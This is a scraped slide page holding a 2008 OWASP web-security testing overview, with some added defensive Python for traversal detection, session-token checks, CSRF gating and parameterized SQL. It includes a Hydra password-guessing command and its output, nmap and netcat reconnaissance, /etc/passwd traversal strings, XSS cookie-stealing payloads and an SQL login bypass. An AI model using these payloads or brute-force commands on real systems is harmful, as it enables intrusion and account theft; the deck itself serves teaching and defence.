AI as an Interface for Commercial Buildings
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
Azure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & ApplicationAzure Monitor & Application Insight to monitor Infrastructure & Application
Azure Monitor & Application Insight to monitor Infrastructure & Application
 

Romulus OWASP

  • 1. OWASP OVERVIEW
    Alberto Pastor Nieto, Informática Gesfor, March 2008
  • 2. OWASP
    The Open Web Application Security Project
    OWASP Top Ten
    OWASP Testing Guide (Tools demonstration)
  • 3. OWASP
    The Open Web Application Security Project
    OWASP Top Ten
    OWASP Testing Guide (Tools demonstration)
  • 4. OWASP
    Open community
    Interested in improving application security
    Not affiliated with any technology company
  • 5. OWASP
    The Open Web Application Security Project
    OWASP Top Ten
    OWASP Testing Guide (Tools demonstration)
  • 6. OWASP TOP TEN (2007)
    1. Cross Site Scripting (XSS)
    2. Injection Flaws
    3. Malicious File Execution
    4. Insecure Direct Object Reference
    5. Cross Site Request Forgery (CSRF)
    6. Information Leakage and Improper Error Handling
    7. Broken Authentication and Session Management
    8. Insecure Cryptographic Storage
    9. Insecure Communications
    10. Failure to Restrict URL Access
  • 7. OWASP
    The Open Web Application Security Project
    OWASP Top Ten
    OWASP Testing Guide (Tools demonstration)
  • 8. Information Gathering
    Testing Web Application Fingerprint
    Application Discovery
    Spidering and Googling
    SSL/TLS Testing
    Testing for File Extensions Handling
    Application Configuration Management Testing
    Old, Backup and Unreferenced Files
  • 9. Information Gathering: Testing Web Application Fingerprint
    Different servers and different versions give different responses
  • 10. Information Gathering: Testing Web Application Fingerprint
    $ nc 202.41.76.251 80
    HEAD / HTTP/1.0

    HTTP/1.1 200 OK
    Date: Mon, 16 Jun 2003 02:53:29 GMT
    Server: Apache/1.3.3 (Unix) (Red Hat/Linux)
    Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT
    ETag: "1813-49b-361b4df6"
    Accept-Ranges: bytes
    Content-Length: 1179
    Connection: close
    Content-Type: text/html
  • 11. Information Gathering: Testing Web Application Fingerprint
    Tools:
    NETCRAFT ( http://www.netcraft.com )
    httprint ( http://www.net-square.com/httprint/ )
  • 12. Information Gathering: Testing Web Application Fingerprint
  • 13. Information Gathering: Application Discovery
    Related issues:
    Different base URL
    Non-standard ports
    Virtual hosts
  • 14. Information Gathering: Application Discovery
    Different base URL:
    Directory exploration?
    Google (site:www.example.com)
    Candidate URLs (e.g. Nessus)
  • 15. Information Gathering: Application Discovery
    Non-standard ports:
    nmap -P0 -sT -sV -p1-65535 192.168.1.100
    Interesting ports on 192.168.1.100:
    (The 65527 ports scanned but not shown below are in state: closed)
    PORT     STATE  SERVICE  VERSION
    22/tcp   open   ssh      OpenSSH 3.5p1 (protocol 1.99)
    80/tcp   open   http     Apache httpd 2.0.40 ((Red Hat Linux))
    443/tcp  open   ssl      OpenSSL
    901/tcp  open   http     Samba SWAT administration server
  • 16. Information Gathering: Application Discovery
    Virtual hosts:
    $ host -t ns www.owasp.org
    www.owasp.org is an alias for owasp.org.
    owasp.org name server ns1.secure.net.
    owasp.org name server ns2.secure.net.
    http://searchdns.netcraft.com/?host
  • 17. Information Gathering: Spidering and Googling
    Spidering: wget -r http://www.example.com
    Googling: googlegath.pl ( http://www.nothink.org/perl/googlegath/ )
  • 18. Information Gathering: SSL/TLS Testing
    Vulnerability scanners: expired certificates, weak ciphers, ...
    Other tools: OpenSSL, SSLDigger
  • 19. Information Gathering: Testing for File Extensions Handling
    Identify underlying technologies
    Tools: wget, curl, web mirroring tools, vulnerability scanners
  • 20. Information Gathering: Application Configuration Management Testing
    Typical files and known directories
    Be careful with HTML comments
    Personalize error pages
    Only load necessary modules
    Minimised privileges
    Log access attempts (both successful and failed)
  • 21. Information Gathering: Old, Backup and Unreferenced Files
    Site map and technology clues
    Content clues
    Practices: look into robots.txt and sitemap files; public information (cache:, site:); search for files ending in ~, .old, .bak ...
  • 22. Information Gathering: Old, Backup and Unreferenced Files
    Do not use mod_autoindex and mod_info (hide unnecessary information)
    Correct permissions
    Use CHROOT
    Logging recommendations
  • 23. Nessus ( http://www.nessus.org )
    Port scanner
    Vulnerability scanner
  • 24. Business Logic Testing
    Automated tools find it hard to understand context
    People who know the business logic
    Strong data testing
  • 25. Authentication: Obtain User Accounts
    Dictionary attacks
    Bruteforce attacks
    Pattern searching attacks
  • 26. Authentication: Obtain User Accounts
    Tools: John the Ripper, Hydra, Brutus, Rainbow Tables
  • 27. Authentication: Obtain User Accounts
    raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" &
    Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
    Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17
    [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task
    [DATA] attacking service http-post-form on port 443
    [STATUS] attack finished for wiki.intranet (waiting for childs to finish)
    [443] host: 10.0.0.1 login: owasp password: password
    [STATUS] attack finished for www.site.com (waiting for childs to finish)
    Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
  • 28. Authentication: Bypassing authentication schema
    Direct page request
    Parameter modification
    Session ID prediction
    SQL Injection
  • 29. Authentication: Bypassing authentication schema
    Tools: WebScarab, WebGoat (Training)
  • 30. Authentication: Directory traversal/file include
    Known as "dot-dot-slash"
    2 evaluation steps:
    Input vectors enumeration
    Testing techniques
  • 31. Authentication: Directory traversal/file include
    Input vectors enumeration:
    HTTP GET and POST requests
    File loading
    HTML forms
    ...
  • 32. Authentication: Directory traversal/file include
    Testing techniques:
    http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
    Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
    http://example.com/index.php?file=http://www.owasp.org/malicioustxt
    CAREFUL WITH CHARSET!!
    %2e%2e%2f is ../
    %2e%2e/ is ../
    %2e%2e%5c is ..\
    ..%2f is ../
    %2e%2e is ..
    ..%5c is ..\
  • 33. Authentication: Directory traversal/file include
    Tools: WebScarab, Paros, Burp Suite
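The detection side of slides 30 to 32: a check that normalises the encoded variants listed on slide 32 (including double encoding and backslashes) and flags traversal or remote-include values in the query string and cookies. This is an added example, not code from the deck; the requests and the cookie are constructed.

```python
"""Detection for the dot-dot-slash and remote-include inputs from slide 32,
including their percent-encoded forms. Added example; the request URLs
and the cookie below are constructed, not taken from any real system."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# ".." as its own path segment: start of string or a non-word separator
# before it, a slash or end of string after it ("file..txt" is not flagged).
TRAVERSAL_RE = re.compile(r"(?:^|[^.\w])\.\.(?:/|$)")
# A URL scheme where a local file name was expected (remote file include).
REMOTE_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def normalize(value, max_rounds=3):
    """Percent-decode until the value stops changing (this exposes double
    encoding such as %252e%252e%252f), then fold backslashes into forward
    slashes so ..%5c and %2e%2e%5c are treated like ../."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def classify(value):
    """Return a finding label for one input value, or None if it is clean."""
    norm = normalize(value)
    if TRAVERSAL_RE.search(norm):
        return "path traversal"
    if REMOTE_RE.match(norm):
        return "remote file include"
    return None


def scan_request(url, cookie_header=""):
    """Check every query parameter and cookie of one request (two of the
    input vectors from slide 31); returns a list of (vector, name, label)."""
    findings = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        label = classify(value)
        if label:
            findings.append(("query", name, label))
    for part in cookie_header.split(";"):
        if "=" not in part:
            continue
        name, value = part.strip().split("=", 1)
        label = classify(value)
        if label:
            findings.append(("cookie", name, label))
    return findings


if __name__ == "__main__":
    # Constructed requests mirroring the slide's examples.
    print(scan_request(
        "http://example.com/getUserProfile.jsp?item=%2e%2e%2f%2e%2e/etc/passwd",
        "USER=1826cc8f:PSTYLE=..%5c..%5cetc%5cpasswd"))
    print(scan_request("http://example.com/index.php?file=http://www.owasp.org/malicioustxt"))
    print(scan_request("http://example.com/index.php?file=report.txt"))
```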
  • 34. Authentication: Vulnerable remember password and password reset
    "Security questions":
    Multiple questions
    Strong questions
    Limited number of attempts
    CAPTCHA
    Sending to email
  • 35. Authentication: Vulnerable remember password and password reset
    Careful with "Remember password": <INPUT TYPE="password" AUTOCOMPLETE="off">
    If the password is kept in a cookie, keep it only in hashed form
  • 36. Session Management: Logout and Browser Cache Management Testing
    Ending a web session:
    The user logs out
    The user remains idle for a certain amount of time and the application automatically logs him/her out
  • 37. Session Management: Logout and Browser Cache Management Testing
    KEY: INVALIDATE THE SERVER-SIDE SESSION
    Java: HttpSession.invalidate()
  • 38. Session Management: Logout and Browser Cache Management Testing
    Other practices:
    Clearly visible "end session" button
    Invalidate cookies on the client side
  • 39. Session Management: Logout and Browser Cache Management Testing
    Tools: WebScarab, Add N Edit Cookies (Firefox ext), Web Developer (Firefox ext)
  • 40. Session Management: Analysis of the Session Management Schema
    Session token analysis:
    Randomness
    Uniqueness
    Resistance to statistical analysis
    Resistance to cryptographic analysis
  • 41. Session Management: Cookie and Session Token Manipulation
    Steps:
    Cookie collection
    Cookie reverse engineering
    Cookie manipulation
  • 42. Session Management: Cookie and Session Token Manipulation
    Tools: WebScarab, Cookie Digger
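A first screen for the token criteria on slide 40 (uniqueness, randomness, resistance to statistical analysis) over a collected sample, as an added example that is not part of the deck; both token sets are constructed here rather than captured from an application.

```python
"""Quick checks for the session-token criteria on slide 40. Added example;
the two token samples are constructed in this file, not captured."""
import math
import secrets
from collections import Counter


def uniqueness(tokens):
    """Fraction of distinct tokens; anything below 1.0 means collisions."""
    return len(set(tokens)) / len(tokens)


def entropy_bits_per_char(tokens):
    """Shannon entropy of the character distribution over the whole sample.
    Hex tokens top out at 4 bits per character, base64 tokens at 6."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())


def looks_sequential(tokens):
    """True if consecutive tokens, read as hex integers, differ by the same
    constant: a counter-based token is trivially predictable."""
    try:
        values = [int(t, 16) for t in tokens]
    except ValueError:
        return False
    diffs = {b - a for a, b in zip(values, values[1:])}
    return len(diffs) == 1


def assess(tokens):
    """Summarise the three checks. This is only a screen; a real review adds
    per-position statistics and a look at how the token is generated."""
    return {"unique": uniqueness(tokens),
            "bits_per_char": round(entropy_bits_per_char(tokens), 2),
            "sequential": looks_sequential(tokens)}


# Constructed samples: 64 random 128-bit tokens versus a hex counter.
RANDOM_TOKENS = [secrets.token_hex(16) for _ in range(64)]
COUNTER_TOKENS = ["%032x" % (0x1000 + i) for i in range(64)]

if __name__ == "__main__":
    print("random :", assess(RANDOM_TOKENS))
    print("counter:", assess(COUNTER_TOKENS))
```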
  • 43. Session Management: Cross Site Request Forgery (CSRF)
    Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated.
    Recommended practices:
    Add session-related information in URLs
    Use POST
    Intermediate pages ("Are you sure you really want to do this?")
    Use REFERER headers
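Three of the four practices on slide 43 as a server-side gate for state-changing requests: POST only, a token tied to the session, and a same-host Referer/Origin when the browser sends one. Added example, not code from the deck; the application host and the request dicts are assumptions constructed for the demonstration.

```python
"""Server-side CSRF checks behind slide 43's recommendations. Added example;
APP_HOST and the request dictionaries are constructed assumptions."""
import hmac
import secrets
from urllib.parse import urlsplit

APP_HOST = "www.example.com"   # assumed host of the protected application


def issue_token(session):
    """Create a per-session anti-CSRF token and remember it server side."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def check_state_change(request, session):
    """Return (True, "ok") if the request may perform a state change,
    otherwise (False, reason). request = {"method", "headers", "form"}."""
    if request["method"] != "POST":
        return False, "state change must use POST, not " + request["method"]
    expected = session.get("csrf_token", "")
    supplied = request["form"].get("csrf_token", "")
    # Constant-time comparison so the check does not leak the token by timing.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong session token"
    # Referer/Origin may be absent, but when a browser sends one, a foreign
    # host is a strong sign that the form was submitted from another site.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if source and urlsplit(source).hostname != APP_HOST:
        return False, "request originates from " + str(urlsplit(source).hostname)
    return True, "ok"


if __name__ == "__main__":
    session = {"user": "alice"}
    token = issue_token(session)
    good = {"method": "POST",
            "headers": {"Referer": "https://www.example.com/transfer"},
            "form": {"to": "bob", "amount": "10", "csrf_token": token}}
    forged = {"method": "POST",
              "headers": {"Referer": "https://other.example/page"},
              "form": {"to": "mallory", "amount": "10", "csrf_token": ""}}
    via_get = {"method": "GET", "headers": {},
               "form": {"to": "bob", "amount": "10"}}
    for req in (good, forged, via_get):
        print(check_state_change(req, session))
```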
  • 44. Data Validation: XSS (Cross Site Scripting)
    XSS: code injection attacks into the various interpreters in the browser.
    http://server/cgi-bin/testcgi.exe?<SCRIPT>alert("Cookie"+document.cookie)</SCRIPT>
    <script src=http://www.example.com/malicious-code.js></script>
    %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
    \x3cscript src=http://www.example.com/malicious-code.js\x3e\x3c/script\x3e
    Revise all input vectors
  • 45. Data Validation: XSS (Cross Site Scripting)
    Tools: OWASP CAL9000
  • 46. Data Validation: SQL Injection
    Insertion or "injection" of an SQL query via the input data from the client to the application.
    Example:
    SELECT * FROM Users WHERE Username='$username' AND Password='$password'
    Input:
    $username = 1' or '1' = '1
    $password = 1' or '1' = '1
    Resulting query:
    SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
  • 47. Data Validation: SQL Injection
    Tools: OWASP SQLiX, SQL DUMPER
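Slide 46's login query run both ways: built by pasting the inputs into the SQL text, as on the slide, and as a parameterized query. This is an added example on an in-memory SQLite database with a constructed Users table, not code from the deck.

```python
"""Slide 46's login query in its vulnerable and parameterized forms.
Added example; the Users table and its single row are constructed."""
import sqlite3


def make_db():
    """Constructed sample data: one account. The password is stored in clear
    only to keep the demonstration short."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.execute("INSERT INTO Users VALUES ('alice', 'correct horse')")
    return db


def login_vulnerable(db, username, password):
    """The slide's query with the inputs concatenated into the SQL text.
    Returns the matched username, or None."""
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same query with placeholders: the driver passes the values separately,
    so a quote in the input never becomes part of the SQL grammar."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1' = '1"   # the input from slide 46
    # Precedence turns the query into ... OR '1' = '1', so every row matches.
    print(login_vulnerable(db, payload, payload))    # alice: check bypassed
    print(login_safe(db, payload, payload))          # None: payload is data
    print(login_safe(db, "alice", "correct horse"))  # alice
```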
  • 48. Data Validation: Other Injections
    LDAP Injection (Lightweight Directory Access Protocol)
    ORM Injection (Hibernate in Java, NHibernate in .NET, ActiveRecord in Ruby on Rails)
    XML Injection
    SSI Injection
    XPath Injection
    IMAP/SMTP Injection
    System command injection
  • 49. Data Validation: Buffer overflow
    Issues caused by buffer overflows:
    Denial of service (DoS)
    Code injection
    Code execution
    Practices:
    Update software
    Best practices
  • 50. Denial of Service
    User accounts blocked (use CAPTCHAs)
    Buffer overflows
    User-specified object allocation
    User input as a loop counter
    User-provided data written to disk
    Failure to release resources
    Storing too much data in the session
  • 51. Web Services
    XML Structural Testing: overloading the XML parser
    XML Content-level Testing: XML/SQL/XPath... injections, validate input size
    Naughty SOAP Attachments Testing
    Man-in-the-middle Testing
  • 52. AJAX Testing
    Increased attack surface with many more inputs to secure
    Exposed internal functions of the application
    Client access to third-party resources with no built-in security and encoding mechanisms
    Failure to protect authentication information and sessions
    Blurred line between client-side and server-side code, resulting in security mistakes
  • 53. Useful Tools
    OWASP Enterprise Security API
    OWASP Encoding (user input validation)
    OWASP Stinger (HTTP request validation)
    OWASP CSRFTester Project
  • 54. Any Questions?
    OWASP ( http://www.owasp.org )
    Romulus Project ( http://www.ict-romulus.org )